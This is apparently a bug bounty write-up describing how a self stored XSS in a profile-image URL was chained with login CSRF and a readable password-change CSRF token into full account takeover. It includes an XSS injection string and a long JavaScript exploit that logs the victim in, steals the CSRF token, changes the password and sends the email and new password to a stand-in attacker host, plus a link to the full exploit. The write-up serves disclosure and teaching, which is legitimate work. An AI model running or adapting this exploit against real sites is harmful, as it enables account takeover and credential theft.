Today I will share with you a recent finding: a self XSS that I turned into a full account takeover by combining it with other misconfigurations and features already available on the website.
EXPLOITATION SCENARIO :
- Self stored XSS
- Login CSRF through the Google login to turn the self XSS into a good XSS
- Log out of the attacker's account
- Use the victim's existing Google login to get into the victim's account
- Steal the password-change CSRF token
- Change the password
- Send email + password to the attacker's server
This was a private program, so everything will be redacted. During my testing I found a simple stored XSS in the profile picture upload functionality. It worked like this: whenever I uploaded an image from my local drive, the website first uploaded it to another server, and in the next request it stored the URL of that image (on the other server) in my profile on the current website. I placed a simple "><script>alert(1)</script> in that URL, something like &imageurl=https://example.com"><script>alert(1)</script>, and the alert box popped up each time I visited my profile. But this was only a self XSS: it ran in my own session, and I needed to make it execute on the victim's side.
After this I described a scenario in the report in which an attacker makes a user visit the website and, with the help of the XSS, does some social engineering to steal the user's data; since the URL in the browser is the website's own, the attack is more believable. The exploit was appreciated by the H1 triager, but he wanted me to execute the XSS in the victim's account for a good impact. And I will say the triager somehow motivated me through his words, and I thank him for that 💙
So the next task for me was to somehow log in to the victim's account and execute the XSS. A quick recap :
- Self XSS on the profile page
- Login CSRF into the attacker's account, using a Google login token, to turn the self XSS into a good XSS
Now my curiosity asked: what if the victim is already using his Google account on the site, can't we use that to pop the XSS on the victim? Yes, definitely. I did some research on this topic and remembered this writeup I had read before, https://www.geekboy.ninja/blog/airbnb-bug-bounty-turning-self-xss-into-good-xss-2/ by @emgeekboy, which helped me a lot in moving forward.
Now I needed a few more things for the next steps :
- There was a separate CSRF token for the password change, and it appeared only in the source of the settings page. I needed it in order to perform the password change.
- The settings page for a user had a URL like https://example.com/user/setting, so I needed the username as well to reach that page and steal the CSRF token.
In this way I was able to completely take over an account starting from a simple self stored XSS.
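Added example, not the author's gist (which is linked below): a model of the post-login stage of the chain, written as the XSS payload would run it inside the victim's session, plus a constructed fake server so the whole flow runs offline. The post gives only the redacted host, the settings URL (/user/setting plus the username) and the &imageurl= injection point; every other path, form field, markup detail and the attacker host attacker.test below is an assumption made to make the flow concrete.

```javascript
// Added example, not the author's gist. Assumed: every path, form field, markup
// detail and the attacker host; only example.com, /user/setting and the idea of
// a settings-page-only CSRF token come from the post.
const ORIGIN = 'https://example.com';

// Assumed markup: the password-change token sits in a hidden input and the
// account email in a named input, both present only on the settings page.
function extractCsrfToken(html) {
  const m = html.match(/<input[^>]*name="csrf_token"[^>]*value="([^"]*)"/i);
  if (!m) throw new Error('password-change csrf token not found');
  return m[1];
}
function extractEmail(html) {
  const m = html.match(/<input[^>]*name="email"[^>]*value="([^"]*)"/i);
  return m ? m[1] : null;
}
// Assumed: the logged-in username is exposed in a data attribute on every page.
function extractUsername(html) {
  const m = html.match(/data-username="([^"]*)"/i);
  if (!m) throw new Error('username not found (not logged in?)');
  return m[1];
}
// Assumed URL shape, built from the post's /user/setting plus the username.
function settingsUrl(username) {
  return `${ORIGIN}/user/${encodeURIComponent(username)}/setting`;
}

// fetchImpl is injectable so the same code runs in the browser (window.fetch)
// and against the fake server below.
async function takeover({ fetchImpl, newPassword, exfilUrl }) {
  const opts = { credentials: 'include' }; // same origin, so cookies go along
  // 1. Drop the attacker session planted by the login CSRF.
  await fetchImpl(`${ORIGIN}/logout`, { ...opts, method: 'POST' });
  // 2. Log back in through Google using the victim's existing Google session.
  //    The real exploit did this in iframes and waited on timeouts because the
  //    OAuth round trip leaves the origin; here it is one assumed request.
  await fetchImpl(`${ORIGIN}/auth/google`, opts);
  // 3. Now inside the victim's account: username first, then the settings page.
  const home = await (await fetchImpl(`${ORIGIN}/`, opts)).text();
  const username = extractUsername(home);
  const settings = await (await fetchImpl(settingsUrl(username), opts)).text();
  const token = extractCsrfToken(settings);
  const email = extractEmail(settings);
  // 4. Change the password with the stolen token (assumed endpoint and fields).
  const body = new URLSearchParams({ csrf_token: token, new_password: newPassword });
  const res = await fetchImpl(`${ORIGIN}/user/${encodeURIComponent(username)}/password`, {
    ...opts, method: 'POST', body,
    headers: { 'content-type': 'application/x-www-form-urlencoded' },
  });
  if (!res.ok) throw new Error(`password change rejected: ${res.status}`);
  // 5. Send email + new password to the attacker's collector.
  await fetchImpl(exfilUrl, { method: 'POST', mode: 'no-cors',
                              body: JSON.stringify({ email, password: newPassword }) });
  return { username, email, token };
}

// Constructed fake server standing in for both origins: tracks who is logged
// in, validates the token on the password change, records what the attacker got.
function fakeServer() {
  const state = { user: 'attacker', changed: null, exfil: null };
  const page = (u) => `<html data-username="${u}"><form>` +
    `<input type="hidden" name="csrf_token" value="tok-${u}">` +
    `<input name="email" value="${u}@mail.test"></form></html>`;
  const reply = (status, text = '') => ({ ok: status < 300, status, text: async () => text });
  async function fetchImpl(url, init = {}) {
    const { hostname, pathname } = new URL(url);
    if (hostname === 'attacker.test') { state.exfil = JSON.parse(init.body); return reply(200); }
    if (pathname === '/logout') { state.user = null; return reply(200); }
    if (pathname === '/auth/google') { state.user = 'victim'; return reply(200); }
    if (!state.user) return reply(401);
    if (pathname === '/') return reply(200, page(state.user));
    if (pathname === `/user/${state.user}/setting`) return reply(200, page(state.user));
    if (pathname === `/user/${state.user}/password`) {
      const p = new URLSearchParams(init.body.toString());
      if (p.get('csrf_token') !== `tok-${state.user}`) return reply(403);
      state.changed = p.get('new_password');
      return reply(200);
    }
    return reply(404);
  }
  return { state, fetchImpl };
}

// Offline demo: run the payload against the fake server and report what happened.
async function demo() {
  const server = fakeServer();
  const result = await takeover({ fetchImpl: server.fetchImpl, newPassword: 'pwned-123',
                                  exfilUrl: 'https://attacker.test/collect' });
  return { ...result, ...server.state };
}

if (typeof window === 'undefined') demo().then((r) => console.log(r));
```

In the browser the payload is just the takeover() call; the fake server exists so you can see the token being read from the settings page and checked by the password endpoint, which is exactly why the script needs the victim's username first.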
You can read the full exploit code here: https://gist.github.com/yourbuddy25/75080f317a464ca8a46acd8e5b5f8be6. The full exploit takes at least a minute to take over an account, because of the timeouts set on the iframes so that they load properly.
MAIN TAKEAWAYS :
- Always try to escalate an XSS: steal personal information from local or session storage, go for an account takeover or privilege escalation, or at least build a believable phishing scenario.
- Every link in this chain was a separate weakness: the unencoded image URL, the login CSRF through the Google login, and a password-change CSRF token that any same-origin script could read. Fixing any one of them breaks the takeover.
I am also actively looking for a penetration testing or other AppSec engineer position. Any recruiter reading this can contact me below.
TWITTER : https://twitter.com/techyfreakk
Thanks for reading :)